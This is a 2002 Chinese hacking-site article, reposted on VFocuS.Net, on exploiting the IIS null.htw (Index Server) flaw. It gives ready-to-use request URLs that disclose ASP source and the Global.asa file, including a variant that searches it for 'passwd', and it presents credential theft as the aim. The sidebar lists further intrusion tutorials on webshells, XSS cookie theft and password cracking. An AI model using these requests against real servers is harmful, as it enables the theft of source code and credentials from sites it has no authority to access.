首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
null.htw 最新利用
来源:vittersafe.tk 作者:vitter 发布时间:2002-08-29  

查查null.htw都会得到这些内容 http://ip/null.htw?ciwebhitsfile=/login.asp "amp;cirestriction="quot;"quot;"amp;cihilitetype=full
/login.asp 从/开始算起
eg: www.xxx.com/a/a.asp

那就把/login.asp改成/a/a.asp http://ip/null.htw?ciwebhitsfile=/a.asp "amp;cirestriction="quot;"quot;"amp;cihilitetype=full
http://ip/null.htw?ciwebhitsfile=/Global.asa "amp;cirestriction="quot;"quot;"amp;cihilitetype=full

由于这个漏洞null.htw最大能力也就是泄露源代码
所以最好运用就是泄露global.asa文件,此文件往往带着名字,密码等重要内容.


讲解一下:null.htw 调用了ciwebhitsfile,cirestriction,cihilitetype
处理.其中
ciwebhitsfile 处理文件
cirestriction 查找信息
cihilitetype 格式
(***个人理解^_^***)
上面我们已经了解了 ciwebhitsfile 处理文件应用

下面我们再说说cirestriction运用^_^
相信很多人都不了解这有什嘛用.其实就是懒人用的(像我就是了)^_^
http://ip/null.htw?ciwebhitsfile=/Global.asa "amp;cirestriction=passwd"amp;cihilitetype=full

cirestriction=passwd (从=后面开始)
这样它就会在global.asa查找passwd(有找到会有连接哦^_^)

其实这篇并没有什嘛新技术,但实际操作的确可用.
并稍微讲解了一下ciwebhitsfile cirestriction cihilitetype,便于新手理解.其中请注意了
新手往往省列掉 ,就是说在/*.asp后cirestriction前必须加上
http://ip/null.htw?ciwebhitsfile=/Global.asa "amp;cirestriction="quot;"quot;"amp;cihilitetype=full

如果没有这 ,那嘛只能返回html的源代码,asp就无法显示了^_^


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·通过Mysql入侵服务器
·SQL数据库的一些攻击
·入侵学校主机兼谈思维方法的培养
·SQL server7.0的远程连接问题
·URL欺騙
·看看SQL是怎么一天内两次改换黑
·通过mysql入侵NT和win2000
·得到NT/2000的Admin以后能做什么
·DIY socks5跳板
·利用网站错误配置获得完全控制
·关于妥善安置telnet后门
·利用unicode和net dde漏洞夺取系
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved